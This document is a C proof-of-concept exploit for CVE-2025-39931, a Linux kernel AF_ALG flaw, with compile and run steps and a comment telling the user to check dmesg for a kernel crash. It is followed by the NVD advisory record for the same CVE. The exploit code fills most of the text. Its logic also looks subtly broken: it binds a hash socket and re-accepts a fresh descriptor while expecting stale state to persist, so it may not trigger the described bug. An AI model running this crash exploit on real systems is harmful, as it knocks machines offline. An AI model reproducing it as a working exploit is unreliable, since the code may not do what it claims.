CVE-2025-39931

/* CVE-2025-39931 PoC - Linux kernel af_alg uninitialized merge crash * This PoC demonstrates triggering a kernel crash via AF_ALG socket * by exploiting the uninitialized ctx->merge field in af_alg_sendmsg. * * Compile: gcc -o poc poc.c * Run: ./poc (requires CAP_NET_RAW or similar privilege for AF_ALG) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if_alg.h> #include <linux/socket.h> int main(int argc, char *argv[]) { int tfmfd, opfd; struct sockaddr_alg sa; char buf[4096]; /* Step 1: Create AF_ALG socket */ tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0); if (tfmfd < 0) { perror("socket(AF_ALG)"); return 1; } /* Step 2: Bind to a hash algorithm (e.g., SHA256) */ memset(&sa, 0, sizeof(sa)); sa.salg_family = AF_ALG; strcpy((char *)sa.salg_type, "hash"); strcpy((char *)sa.salg_name, "sha256"); if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("bind"); close(tfmfd); return 1; } /* Step 3: Accept to get operation fd */ opfd = accept(tfmfd, NULL, NULL); if (opfd < 0) { perror("accept"); close(tfmfd); return 1; } /* Step 4: Trigger error path in af_alg_sendmsg * Send data with flags that cause early abort, leaving ctx->merge * with garbage value from previous iteration. * MSG_MORE or specific message sizes can trigger this condition. */ memset(buf, 'A', sizeof(buf)); /* First send - may partially process and set merge state */ if (send(opfd, buf, 1, MSG_MORE) < 0) { perror("send 1"); } /* Trigger error condition (e.g., invalid operation) */ /* Close and reopen to trigger re-entry with stale merge value */ close(opfd); opfd = accept(tfmfd, NULL, NULL); if (opfd < 0) { perror("accept 2"); close(tfmfd); return 1; } /* Second send - ctx->merge contains garbage, triggers crash */ send(opfd, buf, sizeof(buf), 0); close(opfd); close(tfmfd); printf("PoC completed. Check dmesg for kernel crash.\n"); return 0; }

{"cve": {"id": "CVE-2025-39931", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T08:15:45.827", "lastModified": "2026-05-12T13:17:17.753", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - Set merge to zero early in af_alg_sendmsg\n\nIf an error causes af_alg_sendmsg to abort, ctx->merge may contain\na garbage value from the previous loop. This may then trigger a\ncrash on the next entry into af_alg_sendmsg when it attempts to do\na merge that can't be done.\n\nFix this by setting ctx->merge to zero near the start of the loop."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.38", "versionEndExcluding": "6.1.154", "matchCriteriaId": "90C36693-745D-4EC3-A247-5887CAEA12C7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.108", "matchCriteriaId": "A7E8EAEE-7731-4996-9578-696255D61EA2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.49", "matchCriteriaId": "CAA033E9-A2C5-4976-A83E-9804D8FB827F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.16.9", "matchCriteriaId": "638DD910-1189-4F5E-98BF-2D436B695112"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "340BEEA9-D70D-4290-B502-FBB1032353B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc5:*:*:*:*:*:*", "matchCriteriaId": "47E4C5C0-079F-4838-971B-8C503D48FCC2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc6:*:*:*:*:*:*", "matchCriteriaId": "5A4516A6-C12E-42A4-8C0E-68AEF3264504"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/045ee26aa3920a47ec46d7fcb302420bf01fd753", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2374c11189ef704a3e4863646369f1b8e6a27d71", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/24c1106504c625fabd3b7229611af617b4c27ac7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6241b9e2809b12da9130894cf5beddf088dc1b8a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9574b2330dbd2b5459b74d3b5e9619d39299fc6f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}]}}